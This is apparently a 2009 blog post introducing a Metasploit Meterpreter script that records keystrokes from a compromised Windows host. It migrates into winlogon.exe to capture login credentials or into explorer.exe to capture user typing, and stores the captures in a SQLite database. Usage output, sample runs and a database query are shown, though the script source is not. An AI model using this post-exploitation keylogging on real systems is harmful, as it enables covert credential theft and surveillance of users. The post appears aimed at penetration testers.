After playing with the Meterpreter key logging function and exchanging some emails with my friend Natron I wrote a Meterpreter script that will save all of the key presses from a compromised host in to a Sqlite3 DB for later analysis. The script will perform the following actions:
- Migrate the Meterpreter process depending on the desired type of capture and privileges under it is running to:
- Winlogon.exe – for capture of user credentials as they log in to the compromised host. Only login credential will be captured.
- explorer.exe – for capturing of user keystrokes. No Windows Login credential will be capture in this mode.
- Start the capturing of keystrokes in the time interval specified, if none is given it will capture every 30 seconds.
- Save the captures and a time stamp into a sqlitedb.
meterpreter > run keylogrecorder -hKeylogger Recorder Meterpreter ScriptThis script will start the Meterpreter Keylogger and save all keysin a sqlite3 db for later anlysis. To stop capture hit Ctrl-CUsage:OPTIONS:-c <opt> Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0.-h Help menu.-t <opt> Time interval in seconds between recollection of keystrokes, default 30 seconds.meterpreter >
Execution without any options:
meterpreter > run keylogrecorder[*] Migrating process...[*] explorer.exe Process found, migrating..[*] Migration Successful!![*] Grabbing Desktop Keyboard Input....[*] Starting the keystroke sniffer...[*] Keystrokes being saved in to /home/carlos/.msf3/logs/keylogrecorder/192.168.1.104_20090323.1950/192.168.1.104_20090323.1950.db[*] Recording ..^C[*] Error: Interruptmeterpreter >
Execution of script under user privileges and running with option to migrate to winlogon:
meterpreter > run keylogrecorder -c 1[*] Migrating process...[*] You are not currently running as System to be able to migrate to winlogon.[*] Capturing only logon user keystrokes.[*] explorer.exe Process found, migrating..[*] Migration Successful!![*] Grabbing Desktop Keyboard Input....[*] Starting the keystroke sniffer...[*] Keystrokes being saved in to /home/carlos/.msf3/logs/keylogrecorder/192.168.1.104_20090323.2245/192.168.1.104_20090323.2245.db[*] Recording ..
As you can see it will not let you migrate in to the process if you do not have the proper permissions. To later process the data that is capture in linux you can use sqlite3 command to open the db and query it. Example:
carlos@grinder:~/msf3$ sqlite3 /home/carlos/.msf3/logs/keylogrecorder/192.168.1.104_20090323.2245/192.168.1.104_20090323.2245.dbSQLite version 3.5.9Enter ".help" for instructionssqlite> .schemaCREATE TABLE keystrokes (tkey INTEGER PRIMARY KEY,data TEXT,timeEnter DATE);sqlite> select * from keystrokes;1||20090323.22532||20090323.23263||20090323.23594||20090323.24315||20090323.25046|oks <Back> <Back> thi <Back> s is a test. <Return> I really need to get some cofe <Back> fee in m|20090323.25377|e. <Return> <Return> thank g <Back> God I'm not working on <Back> a SQL or Oracle db doing insets <Back> <Back> rts o I would be restoring f|20090323.2618|rom tape about now. <Return> |20090323.2643sqlite>
Scripts can be written to further parse the DB for information and keywords. I still have to work a better exit method and that empty key capture buffers are not saved in the db wasting space. Give it a try and let me know if you like it.
HD is making some changes in the code and on the names in the menu, as soon as I have a change to test and run in lab I will post an update to the post and the script with the new functionality.
For more information please check the Metasploit blog